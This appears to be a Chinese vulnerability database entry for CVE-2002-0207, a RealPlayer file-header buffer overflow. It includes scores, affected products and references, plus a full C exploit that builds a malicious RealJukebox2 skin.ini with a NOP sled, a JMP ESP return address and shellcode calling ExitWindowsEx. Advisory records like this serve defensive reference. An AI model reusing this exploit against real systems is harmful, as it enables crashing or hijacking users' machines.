CVE-2002-0207
CVSS7.5
发布时间 :2002-05-16 00:00:00
修订时间 :2008-09-10 20:00:42
NMCOE    

[原文]Buffer overflow in Real Networks RealPlayer 8.0 and earlier allows remote attackers to execute arbitrary code via a header length value that exceeds the actual length of the header.


[CNNVD]Real Media RealPlayer媒体文件缓冲区溢出漏洞(CNNVD-200205-040)

        
        RealPlayer是Real Networks公司发布和维护的一个软件包,可以用来播放Real Media格式编码的多媒体文件。软件可运行于Windows、Unix、Linux等平台。
        RealPlayer处理文件格式存在问题,导致程序发生缓冲区溢出,远程攻击者可能在机器上执行任意指令。
        当RealPlayer客户端收到一个畸形的文件头的Real Media文件时,程序可能崩溃。如果攻击者将表示字符串长度的域设置成大于实际长度时,RealPlayer会反应不正常并变得非常不稳定,这通常会导致RealPlayer崩溃。这个问题也可能导致执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:realnetworks:realplayer_intranet:8.0
cpe:/a:realnetworks:realplayer:7.0::unix
cpe:/a:realnetworks:realone_player:2.2::alpha%2C_linux
cpe:/a:realnetworks:realplayer:8.0::mac_os
cpe:/a:realnetworks:realplayer_intranet:7.0
cpe:/a:realnetworks:realone_player
cpe:/a:realnetworks:realplayer:7.0::win32
cpe:/a:realnetworks:realplayer:7.0::mac_os
cpe:/a:realnetworks:realplayer::g2
cpe:/a:realnetworks:realplayer:8.0::win32
cpe:/a:realnetworks:realplayer:8.0::unix

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0207
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0207
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-040
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/7839.php
(VENDOR_ADVISORY)  XF  realplayer-file-header-bo(7839)
http://sentinelchicken.com/advisories/realplayer/
(VENDOR_ADVISORY)  MISC  http://sentinelchicken.com/advisories/realplayer/
http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0044.html
(VENDOR_ADVISORY)  VULN-DEV  20020105 RealPlayer Buffer Problem
http://www.securityfocus.com/bid/3809
(UNKNOWN)  BID  3809
http://online.securityfocus.com/archive/1/252425
(UNKNOWN)  BUGTRAQ  20020124 RealPlayer Buffer Overflow [Sentinel Chicken Networks Security Advisory #01]
http://online.securityfocus.com/archive/1/252414
(UNKNOWN)  BUGTRAQ  20020124 Potential RealPlayer 8 Vulnerability

- 漏洞信息

Real Media RealPlayer媒体文件缓冲区溢出漏洞
高危 边界条件错误
2002-05-16 00:00:00 2006-01-05 00:00:00
远程  
        
        RealPlayer是Real Networks公司发布和维护的一个软件包,可以用来播放Real Media格式编码的多媒体文件。软件可运行于Windows、Unix、Linux等平台。
        RealPlayer处理文件格式存在问题,导致程序发生缓冲区溢出,远程攻击者可能在机器上执行任意指令。
        当RealPlayer客户端收到一个畸形的文件头的Real Media文件时,程序可能崩溃。如果攻击者将表示字符串长度的域设置成大于实际长度时,RealPlayer会反应不正常并变得非常不稳定,这通常会导致RealPlayer崩溃。这个问题也可能导致执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 不要使用RealPlayer打开不可信任的Real Media格式文件。
        厂商补丁:
        Real Networks
        -------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.real.com/products/player/

- 漏洞信息 (21207)

RealPlayer 7.0/8.0 Media File Buffer Overflow Vulnerability (EDBID:21207)
windows remote
2002-01-05 Verified
0 UNYUN
N/A [点击下载]
source: http://www.securityfocus.com/bid/3809/info

RealPlayer is a software package distributed and maintained by Real Media. It is available for Microsoft Windows, Unix, and Linux.

A problem with the handling of file format may make it possible to remotely crash RealPlayer. The problem could also potentially result in code execution.

Upon receiving a file with a malformed header, it is possible to crash the RealPlayer client. A file that specifies a content length greater than the actual size creates a circumstance where RealPlayer reacts unpredictably and becomes unstable. This usually results in the crashing of RealPlayer. This problem may also make it possible to execute arbitrary code.

/*===========================================================
   RealJukebox2 1.0.2.379 Exploit
     for Windows Windows2000 Professional (Service Pack 2)
   The Shadow Penguin Security (http://www.shadowpenguin.org)
   Written by UNYUN (unyun@shadowpenguin.org)
  ============================================================
*/

#include <stdio.h>
#include <windows.h>

#define MAXBUF          4096
#define KERNEL_NAME     "kernel32.dll"
#define SKIN_INI        "skin.ini"
#define INI_FILE \
"[MAIN]\n"\
"Application=RealJukebox\n"\
"Version=2\n"\
"SkinFamilyCount=5\n"\
"\n"\
"CONTROL1Image=%s\n"

#define NOP             0x90
#define FAKE_OFS1       36
#define FAKE_VAL1       0x7FFDF0F0
#define RETADR_OFS      28
#define CODE_OFS        60
#define RETADR_2000pro  0x77e0af64

static unsigned char egg_2000pro[512]={
  0xB8,0xA5,0xFA,0xE1,0x77,0x33,0xDB,0xB3,
  0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD,
  0x00
};

unsigned int search_mem(unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;
    unsigned int    adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
            adr=(unsigned int)p;
            if ((adr&0xff)==0) continue;
            if (((adr>>8)&0xff)==0) continue;
            if (((adr>>16)&0xff)==0) continue;
            if (((adr>>24)&0xff)==0) continue;
            return(adr);
        }
    return(0);
}

void valset(char *buf,unsigned int val)
{
    buf[0]=val&0xff;
    buf[1]=(val>>8)&0xff;
    buf[2]=(val>>16)&0xff;
    buf[3]=(val>>24)&0xff;
}

int main(int argc,char *argv[])
{
    FILE            *fp;
    char            buf[MAXBUF];
    unsigned int    tgt,exw;
    unsigned char   *kp;

    if ((fp=fopen(SKIN_INI,"wb"))==NULL){
        printf("Can not write file.\n");
        exit(1);
    }
    memset(buf,NOP,sizeof(buf));
    buf[sizeof(buf)-1]='\0';

    if ((kp=(unsigned char *)LoadLibrary(KERNEL_NAME))==NULL){
        printf("Can not find %s\n",KERNEL_NAME);
        exit(1);
    }
    tgt=search_mem(kp,kp+0x100000,0xff,0xe4);
    if (tgt==0) tgt=RETADR_2000pro;
    printf("kp            = 0x%x\n",kp);
    printf("JMP ESP addr  = 0x%x\n",tgt);
    exw=(unsigned int)ExitWindowsEx;
    printf("ExitWindowsEx = 0x%x\n",exw);

    valset(buf+FAKE_OFS1,FAKE_VAL1);
    valset(buf+RETADR_OFS,tgt);
    valset(egg_2000pro+1,exw);
    strncpy(buf+CODE_OFS,egg_2000pro,strlen(egg_2000pro));

    fprintf(fp,INI_FILE,buf);
    fclose(fp);
    printf("Created '%s'.\n",SKIN_INI);
    return(0);
}
		

- 漏洞信息

5333
RealPlayer Media File Header Length Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2002-01-05 Unknow
2002-01-05 2002-01-25

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站